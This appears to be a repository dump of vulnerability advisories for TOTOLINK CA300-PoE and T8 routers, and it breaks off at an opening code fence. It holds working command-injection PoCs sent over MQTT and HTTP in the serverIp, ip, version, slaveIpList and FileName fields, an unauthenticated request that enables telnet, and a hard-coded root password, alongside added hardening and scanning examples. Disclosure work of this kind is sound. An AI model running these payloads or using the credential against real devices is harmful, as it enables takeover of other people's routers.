Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 100
Origin: http://192.168.0.254
Connection: keep-alive
Referer: http://192.168.0.254/adm/network_daig.asp?timestamp=1673492576260
Cookie: SESSION_ID=2:1673492439:2

{"topicurl" : "setting/setUploadUserData", "ContentLength":"10485", "FileName": "a|mkdir /setUploadUserData_1111;"}
```

The folder is created successfully:

![image-20230113105118320](images/3.png)

Decompiled `setUploadUserData`; the `FileName` value is passed to `unlink()`, `f_read()` and an `rm -rf` shell command without any validation:

```
int __fastcall setUploadUserData(int a1, int a2, int a3)
{
  const char *FileName_v; // $s3
  int ContentLength_v; // $s1
  int Object; // $s0
  int v9; // $s1
  int v10; // $v0
  int v11; // $s1
  const char *v13; // $a0
  int String; // $v0
  int v15; // $s2
  int v16; // $s0
  char v17[256]; // [sp+24h] [-104h] BYREF

  FileName_v = (const char *)websGetVar(a2, "FileName", ""); // request-controlled, never validated
  ContentLength_v = websGetVar(a2, "ContentLength", "");
  set_action(3);
  Object = cJSON_CreateObject();
  v9 = strtol(ContentLength_v, 0, 10);
  if ( v9 < 1000 )
  {
    v13 = "MSG_userData_error";
    goto LABEL_7;
  }
  if ( v9 >= 1048577 )
  {
    v13 = "MSG_userData_big";
LABEL_7:
    String = cJSON_CreateString(v13);
    cJSON_AddItemToObject(Object, "upgradeERR1", String);
    unlink(FileName_v);
    set_action(0);
    goto LABEL_5;
  }
  if ( !fork(0) )
  {
    sleep(2);
    memset(v17, 0, sizeof(v17));
    v15 = malloc(v9);
    v16 = f_read(FileName_v, v15, 0, v9);
    if ( CS_DBG == 1 )
      printf("(%s:%d)=> inLen=[%d]\n", "setUploadUserData", 350, v16);
    f_write("/tmp/plugin.tar.gz", v15, v16, 0);
    free(v15);
    sprintf(v17, "md5sum %s | awk '{ print $1 }' > %s", "/tmp/plugin.tar.gz", "/userdata/SysPluginMd5");
    CsteSystem(v17, 0);
    CsteSystem("tar zxvf /tmp/plugin.tar.gz -C /tmp", 0);
    CsteSystem("sh /tmp/plugin/plugin.sh", 0);
    CsteSystem("rm -rf /tmp/plugin.tar.gz", 0);
    // injection sink: FileName_v becomes part of the shell command
    sprintf(v17, "rm -rf %s", FileName_v);
    CsteSystem(v17, 0);
    set_action(0);
    exit(1);
  }
  v10 = cJSON_CreateString("1");
  cJSON_AddItemToObject(Object, "upgradeStatus", v10);
LABEL_5:
  v11 = cJSON_Print(Object);
  websGetCfgResponse(a1, a3, v11);
  cJSON_Delete(Object);
  free(v11);
  return 0;
}
```

![image-20230113105039525](images/4.png)

![image-20230113125732755](images/5.png)
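Hardened handling of the `FileName` parameter from `setUploadUserData`, as an added example that is not the firmware's code: the name is confined to a single path component under a fixed directory, deletion uses `unlink()` on the resolved path instead of `rm -rf %s` through a shell, and the `md5sum ... > /userdata/SysPluginMd5` step is run from an argv array with `dup2()` redirection rather than a shell pipeline. `UPLOAD_DIR`, `upload_path`, `run_argv`, `remove_upload` and `write_plugin_md5` are this example's own names; the staging directory is an assumption, since the page does not show where uploads are stored.

```c
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Directory uploads are confined to. Assumed for this example; the page
 * does not show the firmware's real staging path. */
#define UPLOAD_DIR "/tmp/upload"

/* Accept only a bare file name of [A-Za-z0-9._-] that does not start with
 * '.' and is short enough for the path buffer. Shell metacharacters
 * ('|', ';', space, ...) and path separators are rejected, so both
 * "a|mkdir /setUploadUserData_1111;" and "../x" fail. */
static int valid_upload_name(const char *name)
{
    if (name == NULL) return 0;
    size_t len = strlen(name);
    if (len == 0 || len > 64 || name[0] == '.') return 0;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)name[i];
        int ok = (c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') ||
                 (c >= '0' && c <= '9') || c == '.' || c == '_' || c == '-';
        if (!ok) return 0;
    }
    return 1;
}

/* Resolve an untrusted FileName to a path inside UPLOAD_DIR. Returns a
 * pointer to a static buffer (overwritten by the next call), or NULL when
 * the name is rejected. The decompiled function instead passes FileName_v
 * straight to unlink(), f_read() and a shell command. */
const char *upload_path(const char *name)
{
    static char path[128];
    if (!valid_upload_name(name)) return NULL;
    snprintf(path, sizeof path, "%s/%s", UPLOAD_DIR, name);
    return path;
}

/* Run a program from an argv array with fork()/execvp(); optionally send
 * its stdout to a file via dup2(). No shell is involved, so no argument
 * can be interpreted as a command. Returns the exit status or -1. */
int run_argv(char *const argv[], const char *stdout_path)
{
    int status;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        if (stdout_path != NULL) {
            int fd = open(stdout_path, O_WRONLY | O_CREAT | O_TRUNC, 0600);
            if (fd < 0 || dup2(fd, STDOUT_FILENO) < 0) _exit(126);
            close(fd);
        }
        execvp(argv[0], argv);
        _exit(127);
    }
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* Shell-free replacement for sprintf("rm -rf %s", FileName_v) + CsteSystem():
 * the name is validated first, then the file is removed with unlink(). */
int remove_upload(const char *name)
{
    const char *p = upload_path(name);
    if (p == NULL) return -1;
    return unlink(p) == 0 ? 0 : -1;
}

/* Shell-free replacement for "md5sum /tmp/plugin.tar.gz | awk '{print $1}'
 * > /userdata/SysPluginMd5". Without awk the file holds md5sum's full
 * "<hash>  <path>" line, so a reader takes the first whitespace-separated field. */
int write_plugin_md5(void)
{
    char *const argv[] = { "md5sum", "/tmp/plugin.tar.gz", NULL };
    return run_argv(argv, "/userdata/SysPluginMd5") == 0 ? 0 : -1;
}

int main(void)
{
    /* The FileName value from the advisory's PoC is rejected before any use. */
    const char *poc_name = "a|mkdir /setUploadUserData_1111;";
    printf("PoC FileName -> %s\n", upload_path(poc_name) ? "accepted" : "rejected");
    printf("valid        -> %s\n", upload_path("plugin.tar.gz"));
    return 0;
}
```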
-------------------------------------------------------------------------------- /totolink_ca300-poe/telnet_hard_code/images/3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_ca300-poe/telnet_hard_code/images/3.png -------------------------------------------------------------------------------- /totolink_ca300-poe/telnet_hard_code/telnet_hard_code.md: -------------------------------------------------------------------------------- 1 | # TOTOLINK CA300-PoE V6.2c.884 was discovered to contain a hard code password for the telnet service stored in the component /etc/config/product.ini 2 | 3 | ## Description 4 | 5 | There is a hard code password for telnet in **/etc/config/product.ini** 6 | 7 | ![image-20230112103759214](images/1.png) 8 | 9 | ## Firmware information 10 | 11 | * Manufacturer's address:https://www.totolink.net/ 12 | * Firmware download address : https://www.totolink.net/home/menu/detail/menu_listtpl/download/id/139/ids/36.html 13 | 14 | 15 | 16 | ## Affected version 17 | 18 | **Version: V6.2c.884** 19 | 20 | ![image-20230112103905821](images/2.png) 21 | 22 | ## Vulnerability details 23 | 24 | ![image-20230113112528725](images/3.png) -------------------------------------------------------------------------------- /totolink_t8/firmware/TOTOLINK_C8195R-1C_T8_IP04455_8197F_SPI_16M128M_V4.1.5cu.741_B20210916_ALL.web: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_t8/firmware/TOTOLINK_C8195R-1C_T8_IP04455_8197F_SPI_16M128M_V4.1.5cu.741_B20210916_ALL.web -------------------------------------------------------------------------------- /totolink_t8/meshSlaveDlfw/images/1.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_t8/meshSlaveDlfw/images/1.png -------------------------------------------------------------------------------- /totolink_t8/meshSlaveDlfw/images/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_t8/meshSlaveDlfw/images/2.png -------------------------------------------------------------------------------- /totolink_t8/meshSlaveDlfw/images/3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_t8/meshSlaveDlfw/images/3.png -------------------------------------------------------------------------------- /totolink_t8/meshSlaveDlfw/images/4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_t8/meshSlaveDlfw/images/4.png -------------------------------------------------------------------------------- /totolink_t8/meshSlaveDlfw/images/5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_t8/meshSlaveDlfw/images/5.png -------------------------------------------------------------------------------- /totolink_t8/meshSlaveDlfw/meshSlaveDlfw.md: -------------------------------------------------------------------------------- 1 | # A command injection vulnerability in the function meshSlaveDlfw of TOTOLINK Technology routers T8 V4.1.5cu allows attackers to execute arbitrary commands via a crafted MQTT packet. 
2 | 3 | ## Description 4 | 5 | A command injection vulnerability in the function meshSlaveDlfw of TOTOLINK Technology routers T8 V4.1.5cu allows attackers to execute arbitrary commands via a crafted MQTT packet. 6 | 7 | ![image-20230116184500942](images/2.png) 8 | 9 | ## Firmware information 10 | 11 | * Manufacturer's address:https://www.totolink.net/ 12 | 13 | ![image-20230116184157081](images/1.png) 14 | 15 | * Firmware download address : https://totolink.com.my/wp-content/uploads/2023/01/TOTOLINK_C8195R-1C_T8_IP04455_8197F_SPI_16M128M_V4.1.5cu.741_B20210916_ALL.zip 16 | 17 | ## Affected version 18 | 19 | **Version: V4.1.5cu** 20 | 21 | ## Vulnerability details 22 | 23 | The `T8` router opens the `MQTT` service 24 | 25 | ![image-20230116185238612](images/5.png) 26 | 27 | In function `meshSlaveDlfw`,The "serverIp" parameter does not filter user input, which can cause command injection vulnerabilities 28 | 29 | 30 | 31 | ![image-20230116192028632](images/3.png) 32 | 33 | POC 34 | 35 | ``` 36 | import paho.mqtt.client as mqtt 37 | client = mqtt.Client() 38 | client.connect("192.168.0.1",1883,60) 39 | client.publish("totolink/router/meshSlaveDlfw", b'{"serverIp": "|ls>/tmp/meshSlaveDlfw.txt|"}') 40 | ``` 41 | 42 | ![image-20230116192100698](images/4.png) -------------------------------------------------------------------------------- /totolink_t8/meshSlaveUpdate/images/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_t8/meshSlaveUpdate/images/1.png -------------------------------------------------------------------------------- /totolink_t8/meshSlaveUpdate/images/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_t8/meshSlaveUpdate/images/2.png 
-------------------------------------------------------------------------------- /totolink_t8/meshSlaveUpdate/images/3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_t8/meshSlaveUpdate/images/3.png -------------------------------------------------------------------------------- /totolink_t8/meshSlaveUpdate/images/4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_t8/meshSlaveUpdate/images/4.png -------------------------------------------------------------------------------- /totolink_t8/meshSlaveUpdate/images/5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/totolink_t8/meshSlaveUpdate/images/5.png -------------------------------------------------------------------------------- /totolink_t8/meshSlaveUpdate/meshSlaveUpdate.md: -------------------------------------------------------------------------------- 1 | # A command injection vulnerability in the function meshSlaveUpdate of TOTOLINK Technology routers T8 V4.1.5cu allows attackers to execute arbitrary commands via a crafted MQTT packet. 2 | 3 | ## Description 4 | 5 | A command injection vulnerability in the function meshSlaveUpdate of TOTOLINK Technology routers T8 V4.1.5cu allows attackers to execute arbitrary commands via a crafted MQTT packet. 
![image-20230116184500942](images/2.png)

## Firmware information

* Manufacturer's website: https://www.totolink.net/

![image-20230116184157081](images/1.png)

* Firmware download address: https://totolink.com.my/wp-content/uploads/2023/01/TOTOLINK_C8195R-1C_T8_IP04455_8197F_SPI_16M128M_V4.1.5cu.741_B20210916_ALL.zip

## Affected version

**Version: V4.1.5cu**

## Vulnerability details

The T8 router exposes an MQTT broker on port 1883; the POC below connects to it without supplying any credentials.

![image-20230116185238612](images/5.png)

In the function `meshSlaveUpdate`, the `serverIp` field of the message is copied into a shell command without any filtering, so shell metacharacters in that field are executed as commands.

![image-20230116191049592](images/3.png)

POC

```
import paho.mqtt.client as mqtt

# paho-mqtt 1.x API; with paho-mqtt 2.x pass mqtt.CallbackAPIVersion.VERSION1
# as the first argument to Client().
client = mqtt.Client()
# Connect to the router's broker; no username or password is supplied.
client.connect("192.168.0.1", 1883, 60)
# The semicolons terminate the handler's own command and run `ls`, writing
# its output to /tmp so the injection can be confirmed from a shell on the device.
client.publish("totolink/router/meshSlaveUpdate", b'{"serverIp": ";ls>/tmp/meshSlaveUpdate.txt;"}')
```

![image-20230116191129895](images/4.png)
--------------------------------------------------------------------------------
/totolink_t8/recvSlaveCloudCheckStatus_ip/recvSlaveCloudCheckStatus_ip.md:
--------------------------------------------------------------------------------
# A command injection vulnerability in the function recvSlaveCloudCheckStatus of TOTOLINK Technology routers T8 V4.1.5cu allows attackers to execute arbitrary commands via a crafted MQTT packet.

## Description

A command injection vulnerability in the function `recvSlaveCloudCheckStatus` of TOTOLINK T8 routers running firmware V4.1.5cu allows an attacker to execute arbitrary commands via a crafted MQTT packet (this entry covers the `ip` field).
![image-20230116184500942](images/2.png)

## Firmware information

* Manufacturer's website: https://www.totolink.net/

![image-20230116184157081](images/1.png)

* Firmware download address: https://totolink.com.my/wp-content/uploads/2023/01/TOTOLINK_C8195R-1C_T8_IP04455_8197F_SPI_16M128M_V4.1.5cu.741_B20210916_ALL.zip

## Affected version

**Version: V4.1.5cu**

## Vulnerability details

The T8 router exposes an MQTT broker on port 1883; the POC below connects to it without supplying any credentials.

![image-20230116185238612](images/5.png)

In the function `recvSlaveCloudCheckStatus`, the `ip` field of the message is copied into a shell command without any filtering, so shell metacharacters in that field are executed as commands.

![image-20230116190613535](images/3.png)

POC

```
import paho.mqtt.client as mqtt

# paho-mqtt 1.x API; with paho-mqtt 2.x pass mqtt.CallbackAPIVersion.VERSION1
# as the first argument to Client().
client = mqtt.Client()
# Connect to the router's broker; no username or password is supplied.
client.connect("192.168.0.1", 1883, 60)
# Backticks are command substitution: the shell runs `ls` while expanding the
# handler's command line, writing the listing to /tmp as evidence.
client.publish("totolink/router/recvSlaveCloudCheckStatus", b'{"ip": ";`ls>/tmp/recvSlaveCloudCheckStatus_ip.txt`;"}')
```

![image-20230116190913541](images/4.png)
--------------------------------------------------------------------------------
/totolink_t8/recvSlaveCloudCheckStatus_version/recvSlaveCloudCheckStatus.md:
--------------------------------------------------------------------------------
# A command injection vulnerability in the function recvSlaveCloudCheckStatus of TOTOLINK Technology routers T8 V4.1.5cu allows attackers to execute arbitrary commands via a crafted MQTT packet.

## Description

A command injection vulnerability in the function `recvSlaveCloudCheckStatus` of TOTOLINK T8 routers running firmware V4.1.5cu allows an attacker to execute arbitrary commands via a crafted MQTT packet (this entry covers the `version` field).
![image-20230116184500942](images/2.png)

## Firmware information

* Manufacturer's website: https://www.totolink.net/

![image-20230116184157081](images/1.png)

* Firmware download address: https://totolink.com.my/wp-content/uploads/2023/01/TOTOLINK_C8195R-1C_T8_IP04455_8197F_SPI_16M128M_V4.1.5cu.741_B20210916_ALL.zip

## Affected version

**Version: V4.1.5cu**

## Vulnerability details

The T8 router exposes an MQTT broker on port 1883; the POC below connects to it without supplying any credentials.

![image-20230116185238612](images/5.png)

In the function `recvSlaveCloudCheckStatus`, the `version` field of the message is copied into a shell command without any filtering, so shell metacharacters in that field are executed as commands.

![image-20230116190613535](images/3.png)

POC

```
import paho.mqtt.client as mqtt

# paho-mqtt 1.x API; with paho-mqtt 2.x pass mqtt.CallbackAPIVersion.VERSION1
# as the first argument to Client().
client = mqtt.Client()
# Connect to the router's broker; no username or password is supplied.
client.connect("192.168.0.1", 1883, 60)
# Backticks are command substitution: the shell runs `ls` while expanding the
# handler's command line, writing the listing to /tmp as evidence.
client.publish("totolink/router/recvSlaveCloudCheckStatus", b'{"version": ";`ls>/tmp/recvSlaveCloudCheckStatus.txt`;"}')
```

![image-20230116190718260](images/4.png)
--------------------------------------------------------------------------------
/totolink_t8/recvSlaveUpgstatus/recvSlaveUpgstatus.md:
--------------------------------------------------------------------------------
# A command injection vulnerability in the function recvSlaveUpgstatus of TOTOLINK Technology routers T8 V4.1.5cu allows attackers to execute arbitrary commands via a crafted MQTT packet.

## Description

A command injection vulnerability in the function `recvSlaveUpgstatus` of TOTOLINK T8 routers running firmware V4.1.5cu allows an attacker to execute arbitrary commands via a crafted MQTT packet.
![image-20230116184500942](images/2.png)

## Firmware information

* Manufacturer's website: https://www.totolink.net/

![image-20230116184157081](images/1.png)

* Firmware download address: https://totolink.com.my/wp-content/uploads/2023/01/TOTOLINK_C8195R-1C_T8_IP04455_8197F_SPI_16M128M_V4.1.5cu.741_B20210916_ALL.zip

## Affected version

**Version: V4.1.5cu**

## Vulnerability details

The T8 router exposes an MQTT broker on port 1883; the POC below connects to it without supplying any credentials.

![image-20230116185238612](images/5.png)

In the function `recvSlaveUpgstatus`, the `ip` field of the message is copied into a shell command without any filtering, so shell metacharacters in that field are executed as commands.

![image-20230116190012321](images/3.png)

POC

```
import paho.mqtt.client as mqtt

# paho-mqtt 1.x API; with paho-mqtt 2.x pass mqtt.CallbackAPIVersion.VERSION1
# as the first argument to Client().
client = mqtt.Client()
# Connect to the router's broker; no username or password is supplied.
client.connect("192.168.0.1", 1883, 60)
# "status" is sent alongside as in the original POC; the injection is in "ip",
# where the semicolons terminate the handler's command and run `ls`.
client.publish("totolink/router/recvSlaveUpgstatus", b'{"status":"1","ip":";ls>/tmp/recvSlaveUpgstatus.txt;"}')
```

![image-20230116190122667](images/4.png)
--------------------------------------------------------------------------------
/totolink_t8/setUpgradeFW/setUpgradeFW.md:
--------------------------------------------------------------------------------
# TOTOLINK T8 V4.1.5cu was discovered to contain a command injection vulnerability via the slaveIpList parameter in the function setUpgradeFW

## Description

TOTOLINK T8 V4.1.5cu was discovered to contain a command injection vulnerability via the `slaveIpList` parameter in the function `setUpgradeFW`.

![image-20230116184500942](images/2.png)

## Firmware information

* Manufacturer's website: https://www.totolink.net/

![image-20230116184157081](images/1.png)

* Firmware download address: https://totolink.com.my/wp-content/uploads/2023/01/TOTOLINK_C8195R-1C_T8_IP04455_8197F_SPI_16M128M_V4.1.5cu.741_B20210916_ALL.zip

## Affected version

**Version: V4.1.5cu**

## Vulnerability details

In the function `sub_421678` (the handler behind the `setting/setUpgradeFW` topic of `cstecgi.cgi`), the `slaveIpList` parameter is copied into a shell command without any filtering, so shell metacharacters in that parameter are executed as commands.

![image-20230116192918205](images/3.png)

POC
```
import requests

url = "http://192.168.0.1/cgi-bin/cstecgi.cgi"
# Session cookie of a logged-in user: the request is sent as an authenticated client.
cookie = {"SESSION_ID": "2:1672999258:2"}
# slaveIpList closes the double quote around the value, pipes into `ls`, then
# re-opens the quote with `echo "` so the rest of the command line still parses.
data = {'FileName': 'aa',
        'slaveIpList': '0"|ls />/tmp/setUpgradeFW.txt|echo "22',
        'topicurl': 'setting/setUpgradeFW'}
rep = requests.post(url, cookies=cookie, json=data)
print(rep.status_code)
print(rep.text)
```

![image-20230116192841151](images/4.png)
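The payload above is shaped for a value that the handler drops between double quotes: `0"` closes the quote, `|ls />/tmp/setUpgradeFW.txt|` runs `ls` with its output redirected, and `echo "22` re-opens the quote so the remainder of the original command line still parses. The example below is added here and is not code from this repository or from TOTOLINK. It assumes a hypothetical command template `upgrade_slaves "<FileName>" "<slaveIpList>"` (the real command built by `sub_421678` is only visible in the screenshot) and uses Python's `shlex` to show how a POSIX shell would tokenise the interpolated string, then contrasts that with `shlex.quote` and with an allow-list parser that accepts only a comma-separated list of IPv4 addresses and hands them to the helper as separate argv entries.

```python
"""Show why the setUpgradeFW payload escapes a double-quoted argument.

Added example, not code from this repository or from TOTOLINK. TEMPLATE is an
assumed stand-in for the command the handler builds; the real one is not
reproduced on the page.
"""
import ipaddress
import shlex

# The repository's POC value for slaveIpList, verbatim.
POC_SLAVE_IP_LIST = '0"|ls />/tmp/setUpgradeFW.txt|echo "22'

# Assumed vulnerable construction: values dropped straight into double quotes.
TEMPLATE = 'upgrade_slaves "{file_name}" "{slave_ip_list}"'

SHELL_OPERATORS = {"|", ";", "&", "&&", "||"}


def shell_words(command):
    """Tokenise like a POSIX shell, keeping | ; & < > as their own tokens so a
    quote breakout shows up as extra operators instead of one long word."""
    lex = shlex.shlex(command, posix=True, punctuation_chars=True)
    lex.whitespace_split = True
    return list(lex)


def naive_command(file_name, slave_ip_list):
    """The assumed vulnerable pattern: plain string interpolation."""
    return TEMPLATE.format(file_name=file_name, slave_ip_list=slave_ip_list)


def quoted_command(file_name, slave_ip_list):
    """Same command with each value wrapped by shlex.quote, which single-quotes
    anything containing characters the shell would interpret."""
    return "upgrade_slaves {} {}".format(shlex.quote(file_name),
                                         shlex.quote(slave_ip_list))


def command_count(command):
    """How many simple commands the shell would run for this line."""
    return 1 + sum(1 for tok in shell_words(command) if tok in SHELL_OPERATORS)


def parse_ip_list(value):
    """Allow-list parser: a comma-separated list of IPv4 addresses and nothing
    else. Raises ValueError on any other input, including the POC payload."""
    ips = []
    for item in value.split(","):
        ips.append(str(ipaddress.IPv4Address(item.strip())))
    return ips


def accepts_ip_list(value):
    """True when parse_ip_list() would accept the value."""
    try:
        parse_ip_list(value)
    except ValueError:
        return False
    return True


def safe_argv(file_name, slave_ip_list):
    """The actual fix: validated values become separate argv entries and no
    shell is involved; pass this to subprocess.run() without shell=True."""
    if "/" in file_name or file_name.startswith("."):
        raise ValueError("bad file name")
    return ["upgrade_slaves", file_name] + parse_ip_list(slave_ip_list)


if __name__ == "__main__":
    for builder in (naive_command, quoted_command):
        cmd = builder("aa", POC_SLAVE_IP_LIST)
        print(f"{builder.__name__}: {command_count(cmd)} command(s)")
        print("   ", shell_words(cmd))
    print("parse_ip_list accepts POC:", accepts_ip_list(POC_SLAVE_IP_LIST))
    print("safe_argv:", safe_argv("aa", "192.168.0.2,192.168.0.3"))
```

With the POC value, `command_count` reports three commands for the naive template (`upgrade_slaves`, `ls`, `echo`) and one for the `shlex.quote` form, and `parse_ip_list` rejects the value outright. Quoting only narrows the problem, since the shell is still in the loop; the argv form removes it. Note that the request above carries a `SESSION_ID` cookie, so as shown the bug is exercised from an authenticated session.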
--------------------------------------------------------------------------------
/totolink_t8/telnet_login/telnet_login.md:
--------------------------------------------------------------------------------
# TOTOLINK T8 TELNET

## Description

An attacker can enable the Telnet service without authentication and then log in to it with a hard-coded password.

![image-20230116184500942](images/2.png)

## Firmware information

* Manufacturer's website: https://www.totolink.net/

![image-20230116184157081](images/1.png)

* Firmware download address: https://totolink.com.my/wp-content/uploads/2023/01/TOTOLINK_C8195R-1C_T8_IP04455_8197F_SPI_16M128M_V4.1.5cu.741_B20210916_ALL.zip

## Affected version

**Version: V4.1.5cu**

## Vulnerability details

Telnet is enabled by sending the following POST request to `cstecgi.cgi`; no session cookie is required.
```
import requests

url = "http://192.168.0.1/cgi-bin/cstecgi.cgi"
# No cookie is sent: the telnet toggle is reachable without a session.
data = '{"telnet_enabled":"1","topicurl":"setTelnetCfg"}'
rep = requests.post(url, data=data)
print(rep.status_code)
print(rep.content)
```

The default account and password are stored in the file `/web_cste/cgi-bin/product.ini`: `root:KL@UHeZ0`

![image-20230116195313617](images/6.png)

![image-20230116194911323](images/4.png)

In `/bin/cs`:

![image-20230116194625197](images/3.png)

In `bin/convertIniToCfg`:

![image-20230116195206223](images/5.png)

Logging in with these credentials succeeds:

![image-20230116195635180](images/7.png)
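A reviewer checking a firmware image for this class of issue does not need the device: the password sits in a text file in the extracted root filesystem, and the scripts that start `telnetd` are there too. The example below is added here and is not code from this repository or from TOTOLINK. It walks an extracted root, flags credential-looking lines in ini, config and boot files, and treats `/etc/passwd`-style lines specially so that only a populated hash field counts as a finding. The files it writes for the demo are constructed stand-ins (the page reports that `product.ini` holds `root:KL@UHeZ0`; the ini key names and the other files below are assumed, not copied from the firmware).

```python
"""Triage an extracted firmware root for hard-coded credentials and telnet.

Added example, not code from this repository or from TOTOLINK. The page reports
a root password in /web_cste/cgi-bin/product.ini; the ini key names and every
other file written by build_demo_root() are constructed for the demo.
"""
import os
import re
import tempfile

# Only text files that commonly carry configuration or boot logic.
SCAN_NAMES = (".ini", ".cfg", ".conf", ".sh", "rcS", "passwd", "shadow")

PATTERNS = [
    ("user:pass pair", re.compile(r"^\s*(?:root|admin)\s*:\s*[^\s:]{4,}\s*$")),
    ("password key", re.compile(r"(?i)\b\w*pass(?:word|wd)?\w*\s*=\s*\S+")),
    ("telnet daemon", re.compile(r"\btelnetd\b")),
]
# name:hash:uid:gid:... (passwd) or name:hash:lastchg:min:... (shadow)
PASSWD_LINE = re.compile(r"^([^:\s]+):([^:]*):\d+:\d+:")


def classify_line(line):
    """Return the labels that apply to one line of a config/boot file."""
    m = PASSWD_LINE.match(line)
    if m:
        # passwd/shadow format: only a populated hash field is a finding;
        # 'x', '*' and '!' mean the account is shadowed or locked.
        return ["passwd hash"] if m.group(2) not in ("", "x", "*", "!") else []
    return [label for label, rx in PATTERNS if rx.search(line)]


def scan_root(root):
    """Walk an extracted firmware root; return findings as dicts."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith(SCAN_NAMES):
                continue
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            with open(path, "r", encoding="utf-8", errors="replace") as fh:
                for lineno, line in enumerate(fh, 1):
                    line = line.rstrip("\n")
                    for label in classify_line(line):
                        findings.append({"file": rel, "line": lineno,
                                         "label": label, "text": line})
    return findings


# Constructed stand-ins for the demo; key names and contents are assumed.
DEMO_FILES = {
    "web_cste/cgi-bin/product.ini": "[telnet]\ntelnet_user=root\ntelnet_pass=KL@UHeZ0\n",
    "etc/init.d/rcS": "#!/bin/sh\nmount -a\ntelnetd -l /bin/login &\n",
    "etc/passwd": "root:x:0:0:root:/root:/bin/sh\nnobody:*:99:99::/:/bin/false\n",
    "etc/shadow": "root:$1$abcdefgh$ijklmnopqrstuvwxyz12345:18000:0:99999:7:::\n",
    "etc/hostname": "totolink\n",
}


def build_demo_root():
    """Write the constructed files into a fresh temp directory; return its path."""
    root = tempfile.mkdtemp(prefix="fw_demo_")
    for rel, content in DEMO_FILES.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(content)
    return root


def demo_findings():
    """Scan the constructed demo root."""
    return scan_root(build_demo_root())


if __name__ == "__main__":
    for f in demo_findings():
        print(f"{f['file']}:{f['line']} [{f['label']}] {f['text']}")
```

Run it against a real extracted root with `scan_root("/path/to/squashfs-root")`. On the demo tree it reports the `telnet_pass` line in `product.ini`, the `telnetd` start in `rcS` and the populated hash in `etc/shadow`, and stays quiet on `etc/passwd`, whose `x` and `*` fields carry no secret.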
--------------------------------------------------------------------------------
/totolink_t8/updateWifiInfo/updateWifiInfo.md:
--------------------------------------------------------------------------------
# A command injection vulnerability in the function updateWifiInfo of TOTOLINK Technology routers T8 V4.1.5cu allows attackers to execute arbitrary commands via a crafted MQTT packet.

## Description

A command injection vulnerability in the function `updateWifiInfo` of TOTOLINK T8 routers running firmware V4.1.5cu allows an attacker to execute arbitrary commands via a crafted MQTT packet.
![image-20230116184500942](images/2.png)

## Firmware information

* Manufacturer's website: https://www.totolink.net/

![image-20230116184157081](images/1.png)

* Firmware download address: https://totolink.com.my/wp-content/uploads/2023/01/TOTOLINK_C8195R-1C_T8_IP04455_8197F_SPI_16M128M_V4.1.5cu.741_B20210916_ALL.zip

## Affected version

**Version: V4.1.5cu**

## Vulnerability details

The T8 router exposes an MQTT broker on port 1883; the POC below connects to it without supplying any credentials.

![image-20230116185238612](images/5.png)

In the function `updateWifiInfo`, the `serverIp` field of the message is copied into a shell command without any filtering, so shell metacharacters in that field are executed as commands.

![image-20230116184932045](images/3.png)

POC

```
import paho.mqtt.client as mqtt

# paho-mqtt 1.x API; with paho-mqtt 2.x pass mqtt.CallbackAPIVersion.VERSION1
# as the first argument to Client().
client = mqtt.Client()
# Connect to the router's broker; no username or password is supplied.
client.connect("192.168.0.1", 1883, 60)
# "newMd5" is sent alongside as in the original POC; the injection is in
# "serverIp", where the semicolons terminate the handler's command and run `ls`.
client.publish("totolink/router/updateWifiInfo", b'{"newMd5":"1","serverIp":";ls>/tmp/updateWifiInfo.txt;"}')
```

![image-20230116185057455](images/4.png)
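The six MQTT advisories in this section (`meshSlaveDlfw`, `meshSlaveUpdate`, both `recvSlaveCloudCheckStatus` entries, `recvSlaveUpgstatus` and `updateWifiInfo`) share one defect: a JSON string from the message is copied into a shell command line. The example below is added here and is not firmware code, nor code from this repository. It shows, in Python, the shape of a hardened handler: every topic declares the fields it reads, each field is checked against the type it is supposed to carry (an IP address is parsed with `ipaddress`, which rejects every metacharacter the POCs use), and the surviving values become separate argv entries for a helper instead of text in a shell string. It then runs the repository's own POC messages through the validator so the rejection can be seen offline. The helper path in `build_argv` and the exact shape demanded of `version`, `status` and `newMd5` are assumptions.

```python
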